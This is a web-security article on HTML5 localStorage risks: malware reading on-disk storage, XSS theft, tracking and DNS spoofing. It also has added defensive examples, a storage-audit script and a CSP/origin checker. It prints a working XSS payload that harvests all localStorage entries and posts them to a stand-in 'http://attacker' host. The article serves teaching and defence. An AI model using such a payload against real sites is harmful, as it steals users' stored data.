HTML5 localStorage Attack Vectors & Security
By Shreeraj Shah (Blueinfy & iAppSecure)

Storage can expand the attack surface for application users. Storage brings both privacy and security concerns for end clients within their browsers. It is imperative to have an appropriate defense and proper protection in place to address this set of issues. The following attacks are possible:

Attack agent fetching sensitive information

LocalStorage is created on the physical hard drive, and this file can be accessed by malware or a virus that has access to the underlying OS. For example, in the case of Chrome, a SQLite file is created in the user directory as shown below.

Figure 1 – Directory listing of localStorage SQLite files in the user directory in Chrome

It is easy to open these files in any SQLite client application and see the information stored by the application on the local system, as shown below.

Figure 2 – Viewing localStorage files in a SQL client application
Hence, sensitive data stored in localStorage is at significant risk from various standpoints, even though it is of great value from a programming perspective.

Attack through XSS

XSS can be a lethal attack vector for storage. All storage is accessible from JavaScript. A cookie marked HttpOnly is not available to JavaScript, but with sessionStorage and localStorage the game changes a bit. Hence, if an application is found to be vulnerable to XSS, an attacker can execute a payload that fetches all sessionStorage and localStorage values and sends them back to his own site. Sensitive information is compromised and the attacker gets access to the entire set of interesting information. The XSS can be of any type – reflected, persistent or DOM-based.

For example, here is a simple payload.

```javascript
var xmlhttp = false;
var ls = "";
// Enumerate every entry in localStorage into the string ls
if (localStorage.length) {
  console.log(localStorage.length);
  for (var i in localStorage) {
    ls += "(" + i + "-" + localStorage.getItem(i) + ")";
  }
}
// Post the harvested string to the attacker's server
function sendreq() {
  xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST", "http://attacker/msg/" + ls + "", true);
  // Using text/plain to bypass preflight call
  xmlhttp.setRequestHeader("Content-Type", "text/plain");
  xmlhttp.send(ls);
}
sendreq();
```

Let’s look at the first loop, shown below.

```javascript
if (localStorage.length) {
  console.log(localStorage.length);
  for (var i in localStorage) {
    ls += "(" + i + "-" + localStorage.getItem(i) + ")";
  }
}
```
In this loop all variables from localStorage are obtained with the getItem() call, and the values are fetched along with their keys. All of these get stored in the “ls” variable, as shown below.

Figure 3 – Enumerating the contents of the variable “ls”

In the next call, the attacker sends this harvested value back to his own server, using an XHR call with “text/plain” to bypass the pre-flight call, as shown below.

```javascript
function sendreq() {
  xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST", "http://attacker/msg/" + ls + "", true);
  // Using text/plain to bypass preflight call
  xmlhttp.setRequestHeader("Content-Type", "text/plain");
  xmlhttp.send(ls);
}
```

Finally, when the sendreq() call is made, the attacker gets the following response on the browser stack.

Figure 4 – Browser stack response to the sendreq() call
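The payload walked through above harvests whatever the application has left in storage. The defender's version of the same walk is an inventory of what any script running in the origin can read, so that session material, card data or personal details are found in storage before an attacker finds them. The following is an added example and is not code from the paper or from Blueinfy: because Node has no window.localStorage, it builds a small in-memory stand-in (MemoryStorage) with constructed sample entries modelled on the bank scenario later on the page, and the auditStorage function, the luhnValid helper and the heuristic patterns are assumptions of this example. In a browser the same function can be pointed at window.localStorage or window.sessionStorage.

```javascript
// Added example, not from the paper: a defender-side inventory of what any
// script running in an origin can read from Web Storage. Node has no
// window.localStorage, so MemoryStorage below is a constructed stand-in
// for the Storage interface (length, key, getItem, setItem); in a browser,
// pass window.localStorage or window.sessionStorage to auditStorage instead.
class MemoryStorage {
  constructor(entries) { this.map = new Map(Object.entries(entries || {})); }
  get length() { return this.map.size; }
  key(n) { const keys = Array.from(this.map.keys()); return n < keys.length ? keys[n] : null; }
  getItem(k) { return this.map.has(k) ? this.map.get(k) : null; }
  setItem(k, v) { this.map.set(String(k), String(v)); }
}

// Luhn check so that only plausible card numbers, not any 13-19 digit run
// such as a millisecond timestamp, are reported as card data.
function luhnValid(digits) {
  let sum = 0;
  let double = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (double) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    double = !double;
  }
  return digits.length > 0 && sum % 10 === 0;
}

// Heuristics for data that should not live in client-side storage at all
// (constructed for this example; tune to the application).
const SENSITIVE_KEY = /(session|token|jwt|auth|password|secret|ssn|card)/i;
const VALUE_CHECKS = [
  { name: 'jwt', test: (v) => /^eyJ[\w-]+\.[\w-]+\.[\w-]*$/.test(v) },
  { name: 'card', test: (v) => {
      const m = v.match(/\b(?:\d[ -]?){13,19}\b/);
      return m !== null && luhnValid(m[0].replace(/\D/g, ''));
    } },
  { name: 'email', test: (v) => /[^\s@]+@[^\s@]+\.[^\s@]+/.test(v) },
];

// Walk the store through the Storage API (length/key/getItem). This is the
// same enumeration the payload performs, done here to find exposure before
// an attacker does; the API walk also avoids the inherited members (getItem,
// length, ...) that for...in over a Storage object yields alongside the keys.
function auditStorage(storage) {
  const findings = [];
  for (let n = 0; n < storage.length; n++) {
    const key = storage.key(n);
    const value = storage.getItem(key);
    const reasons = [];
    if (SENSITIVE_KEY.test(key)) reasons.push('key name');
    for (const check of VALUE_CHECKS) {
      if (check.test(value)) reasons.push(check.name);
    }
    if (reasons.length > 0) findings.push({ key, reasons, bytes: value.length });
  }
  return findings;
}

// Constructed sample contents, modelled on the bank scenario in the paper.
const sample = new MemoryStorage({
  'ui.theme': 'dark',
  'auth_token': 'eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI0MiJ9.c2lnbmF0dXJl',
  'profile': '{"name":"A. User","email":"a.user@example.com"}',
  'lastTxn': '4111 1111 1111 1111 / 12.50',
});

console.log(auditStorage(sample));
// → auth_token (key name, jwt), profile (email), lastTxn (card)
```

Every finding is something an XSS payload like the one above would carry off in one request, so the fix is not to obfuscate the value but to move it server-side (an HttpOnly cookie for the session, a server-held profile fetched on demand) and leave only non-sensitive state, such as the theme preference, in storage.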
Hence, the attacker is successful in enumerating values and sending them back to the server. It is possible to apply the same routine to sessionStorage using that object. This technique is a completely blind enumeration: no information about the application is required; if the application uses the localStorage object, the loop simply walks all entries and fetches their values, as shown below.

```javascript
for (var i in localStorage) {
  ls += "(" + i + "-" + localStorage.getItem(i) + ")";
}
```

It is important to note that applications running with HTML5 use a single DOM, and when the attacker finds DOM-based access it is child’s play for him to inject and exploit DOM-based calls. These calls could come from a third-party server, or the content could come from untrusted sources.

Tracking users and invading privacy

LocalStorage is permanent and is glued to the browser. An attacker or an advertising company can drop a localStorage identifier for a specific domain and then have full tracking available through APIs. These API calls can be passed to their respective sites to track users across the world, since the identifier is glued to a single browser. A company with access to multiple servers, such as an ad server, can start tracking a user from a single domain and craft its advertising game plan. This invades the privacy of the user. Using localStorage, a user could be mapped to his/her real identity, allowing persistent tracking using JavaScript. Currently, the privacy area is a little ignored from the HTML5 point of view; in future this may be a cause of concern for end users.

DNS spoofing attack vector

LocalStorage is accessible based on the origin or domain. Hence, if DNS is spoofed, the attacker gets access to the browser session. In this case the localStorage created by targeting the application can provide access to the sensitive data stored in the browser. This can lead to a potential security breach and data theft.
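Why the TLS defence the page recommends works for storage, as an added example that is not part of the paper: Web Storage is keyed by origin, meaning scheme, host and port, so a spoofed host reached over plain http is a different origin from the https application and cannot read its store; the browser only treats content as the https origin when a valid certificate is presented. The same scheme-and-host check also drives Content-Security-Policy, whose connect-src directive would refuse the XHR the earlier payload makes to http://attacker. The functions storageOrigin, sharesStorage and connectAllowed, and the SECURITY_HEADERS values, are constructed for this example; the hostnames are placeholders.

```javascript
// Added example, not from the paper: Web Storage is partitioned by origin,
// i.e. (scheme, host, port), so the defence is to keep the application on a
// single https origin and to restrict where script may send data.
// All hostnames and header values below are constructed placeholders.

// Canonical origin string used as the storage key; default ports made explicit.
function storageOrigin(url) {
  const u = new URL(url);
  const port = u.port || (u.protocol === 'https:' ? '443' : '80');
  return `${u.protocol}//${u.hostname}:${port}`;
}

// Two pages share localStorage only if their origins are identical,
// so https://bank.example and http://bank.example have separate stores.
function sharesStorage(urlA, urlB) {
  return storageOrigin(urlA) === storageOrigin(urlB);
}

// Headers the application would send (constructed values).
// HSTS pins the browser to https; CSP limits where XHR may connect.
const SECURITY_HEADERS = {
  'Strict-Transport-Security': 'max-age=31536000; includeSubDomains',
  'Content-Security-Policy':
    "default-src 'self'; connect-src 'self' https://api.bank.example; script-src 'self'",
};

// Minimal connect-src evaluator: does the policy allow an XHR from pageUrl
// to targetUrl? Supports 'self', 'none', '*', scheme-only sources (https:)
// and exact origins; host wildcards and path matching are not implemented.
function connectAllowed(cspHeader, pageUrl, targetUrl) {
  const directives = {};
  for (const part of cspHeader.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) directives[name] = sources;
  }
  const sources = directives['connect-src'] || directives['default-src'] || ['*'];
  const target = new URL(targetUrl);
  const targetOrigin = storageOrigin(targetUrl);
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === '*') return true;
    if (src === "'self'") return storageOrigin(pageUrl) === targetOrigin;
    if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return target.protocol.toLowerCase() === src.toLowerCase();
    try { return storageOrigin(src) === targetOrigin; } catch (e) { return false; }
  });
}

// Stand-alone run: the payload earlier on the page posts to http://attacker.
console.log(sharesStorage('https://bank.example/app', 'http://bank.example/app')); // false
console.log(connectAllowed(SECURITY_HEADERS['Content-Security-Policy'],
  'https://bank.example/app', 'http://attacker/msg/x')); // false
```

Strict-Transport-Security is what closes the DNS spoofing window: once the browser has seen it, it refuses to load the http origin at all and treats a certificate error on that host as fatal rather than as a click-through warning, so a spoofed resolver cannot get script executed under the application's origin. The CSP evaluator is deliberately minimal (no host wildcards, no path matching) and is a check for reasoning about a policy string, not a substitute for the browser's enforcement.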
For example, if a bank stores an identifier, profile and the last 5 transactions in localStorage, the attacker can get access to this sensitive set of information via DNS spoofing at the ISP end. The application should defend its implementation by using TLS, which should ensure that the correct certificate is present before communicating and executing JavaScript in the browser session.

About the Author

Shreeraj Shah
Founder & Director
Blueinfy and iAppSecure
www.blueinfy.com | www.iappsecure.com
Blog: http://shreeraj.blogspot.com
Twitter: @shreeraj
